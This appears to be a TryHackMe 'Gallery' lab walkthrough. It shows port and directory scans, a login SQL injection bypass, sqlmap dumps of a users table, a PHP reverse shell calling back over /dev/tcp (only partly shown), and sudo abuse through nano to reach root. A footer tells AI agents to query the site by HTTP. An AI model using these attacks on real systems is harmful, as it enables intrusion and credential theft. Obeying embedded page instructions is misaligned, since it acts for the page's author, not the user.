# Gallery **Room Link:** ### Initial Scan **Kali**

nmap -A $VICTIM

### Scan all ports No other ports found **Kali**

nmap -sV -sT -O -p 1-65535 $VICTIM

### TCP/80 - HTTP **Kali** ``` gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt ```

### TCP/8080 - HTTP **Kali** ``` gobuster dir -u http://$VICTIM:8080 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt --wildcard ``` ### TCP/80 - HTTP

## SQL Injection SQL injection worked on username field ``` Username: 1' or '1'='1'-- - Password: anything ```

We found two databases **Kali** ``` sudo sqlmap -r request.req --dbs ```

Get tables **Kali** ``` sudo sqlmap -r request.req --current-db gallery_db --tables ```

Get fields for table users **Kali** ``` sudo sqlmap -r request.req --current-db gallery_db --tables -T users --columns ```

Get values of the username and password fields. I couldn't crack the hash. **Kali** ``` sudo sqlmap -r request.req --current-db gallery_db --tables -T users -C username,password --dump ```

## Initial Shell I was able to upload a php reverse shell instead of an image **Kali** ``` nc -lvnp 443 ``` **revshell.php code** ``` & /dev/tcp/$KALI/443 0>&1'"); ?> ```

Get autocomplete

python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

We found a list of passwords from mike in a file called accounts and another password in history

**Victim** ``` su mike Password: b3stpassw0rdbr0xx ```

## Privilege Escalation **Exploit:** mike is able to run a script with NOPASSWD, looking at the script it, there are a few options to select. One option is to run nano which we can use to get sudo. I also noticed my terminal would not open nano so I exported xterm **Victim** ``` sudo -l export TERM="xterm" ```

**Victim** ``` sudo /bin/bash /opt/rootkit.sh ^R^X reset; sh 1>&0 2>&0 ```

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/gallery.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.